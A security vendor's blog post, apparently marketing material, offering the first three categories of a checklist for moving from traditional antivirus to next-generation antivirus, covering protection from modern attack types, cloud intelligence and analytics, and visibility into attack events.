In recent weeks, we’ve written on some pretty timely and interesting topics. We first discussed the ineffectiveness of traditional antivirus, which catches less than half of noteworthy malicious events. We then introduced, defined, and discussed Next-Generation Antivirus (NGAV), the natural (and much needed) evolution of AV that protects computers from the full spectrum of modern cyber attacks.
Today (and next week) we’ll take a bit of a different approach. We put you, the reader, in the driver’s seat when it comes to re-thinking your endpoint defenses and provide you with a checklist of items to consider as you make your decision to transition to NGAV. After all, once you have been informed, you still need to determine the best path forward for your security program.
Traditional antivirus was designed and built before the explosion of cybercrime and the speed at which tools and techniques are now changing. Modern attacks often utilize techniques that leverage built-in tools and scripts, much different from the days where attacks were almost always malicious binaries. Furthermore, it’s not just about the kinds of attacks, it’s about being able to quickly protect yourself versus waiting for your vendor to push out signatures, hoping that your endpoints receive the update before that malicious email lands in your employees’ inboxes.
To reduce your environment’s cyber risk, you need an endpoint-security approach that goes beyond malware, incorporating next-generation features that target the tactics, techniques, and procedures frequently used by both mass scale opportunistic attackers and advanced threats specifically targeting your organization.
This checklist will help you assess the capabilities of your current antivirus solution and will provide guidance for migrating to a more mature posture. You may have unique requirements or constraints (everyone does), but what we list here will ease your shift to next-generation anti-virus.
Checklist Category #1: Protection from the Full Range of Modern Attacks
Modern attackers generate malware faster than traditional AV stops it. Furthermore, they are mastering techniques that don’t even require malware. Your endpoint security solution should protect against all attacks, not just threats that involve running a malicious executable. Beyond the initial execution blocks, there should be strong protection against particularly useful adversarial techniques like thread injection and ram scraping.
In evaluating an NGAV solution, make sure it protects against:
- Known malware and variants including malware-based ransomware
- Obfuscated, evasive, or previously unknown malware
- Compromised (exploited) legitimate software (Flash, Silverlight, etc)
- Malicious scripts and interpreted code like PowerShell, Visual Basic, Perl, Python, Java
- Memory-resident and file-less attacks
- Document-based attacks (PDFs and macros)
- Remote login attacks and the malicious use of valid software (living off the land)
Checklist Category #2: Extensible Cloud Security Intelligence and Analytics
As attackers evolve and adapt their tactics and techniques, you need to employ new analytic capabilities and attack intelligence to properly defend yourself – without having to redeploy your security infrastructure.
Your NGAV should feature:
- A cloud backend for high-powered analysis and the application of vendor intelligence
- Multiple inspection engines that focus on reputation, behavior, and event relationships
- Configurable detection sensitivities to prioritize important events and reduce unnecessary alerting
- Open & extensible threat feeds for third-party attack intelligence and for leveraging security investments you’ve already made
- Community-based intelligence sharing and the network effect of benefiting from attacks other users witness
Checklist Category #3: Visibility and Context into Attack and Detection Events
After an attack attempt, you need to understand what happened so you can contain and control the situation, prevent further damage, and improve your overall security posture. The right context helps you do all that quickly and easily. If each attack doesn’t make you stronger, we recommend a reconsideration of your approach.
Your NGAV solution should provide:
- Insight into how the threat started, even before it was detected (root cause)
- Visibility into where else in your organization this threat may exist (scope)
- Guidance on what’s needed to recover and how to close gaps (education and maturity)
- Data sharing data within your ecosystem (SIEM, etc) (integration and automation)
Tune into next week’s blog to read about checklist categories four through six, or download the full “It’s Time to Replace Antivirus Checklist” here.
The Antivirus Replacement Checklist provides:
- A list of features you need to prioritize for possible NGAV solutions
- Guidance on how to find a solution that will stop more than just malware
- Criteria you can use to make sure a solution will be the best fit for your organization.